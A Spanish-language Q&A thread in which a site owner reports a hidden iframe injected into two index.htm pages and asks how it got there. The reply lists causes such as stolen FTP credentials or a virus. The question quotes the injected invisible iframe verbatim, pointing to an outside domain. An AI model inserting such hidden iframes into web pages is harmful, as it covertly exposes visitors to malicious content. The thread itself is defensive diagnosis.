Iframe hack / done a través de FTP?

0

En dos sitios web que hospedo para un amigo, encontré que hay un iframe en la parte inferior del archivo index.htm de cada sitio.

<iframe src="http://www.kunstsalen.dk"width=1height=1style="visibility: hidden; position: absolute;"></iframe>

Esto no es algo que debería estar en sus páginas de inicio. Está provocando que aparezca una advertencia de seguridad en los navegadores que dice que su sitio web es un sitio infectado o con virus. ¿Cómo llegó esto? Tiene acceso a FTP y ambos archivos se modificaron el 05/11/2011 aproximadamente al mismo tiempo. ¿Podría tener un virus que cambió sus archivos index.htm locales y los subió sin saberlo? ¿Podría un virus usar su información FTP guardada para iniciar sesión y cambiar los archivos sin que él lo sepa?

La razón por la que supongo que se originó en su máquina es porque tengo más de 500 archivos index.htm en mi servidor y ninguno de ellos se vio afectado. Solo los dos archivos index.htm a los que se puede acceder a través de su cuenta de FTP.

    
pregunta Rush Frisby 19.12.2011 - 22:04
fuente

1 respuesta

2

Puede haber varios escenarios (es difícil saberlo sin saber más).

  1. Se robaron las credenciales de FTP de sus amigos y alguien inició sesión y cargó versiones modificadas de estos archivos. Este puede ser un keylogger en una de sus computadoras (como ejemplo)

  2. Las otras credenciales de sus amigos fueron robadas (¿correo electrónico?) y se usaron para obtener acceso al sitio web. Este puede ser el acceso a la consola de administración y / o SSH.

  3. El proveedor de sus amigos fue hackeado y hubo varios clientes afectados

  4. Tu amigo tiene un virus en su computadora que modifica archivos específicos (por ejemplo, * .php) agregando este iframe.

etc

    
respondido por el DmitryK 20.12.2011 - 11:13
fuente

Lea otras preguntas en las etiquetas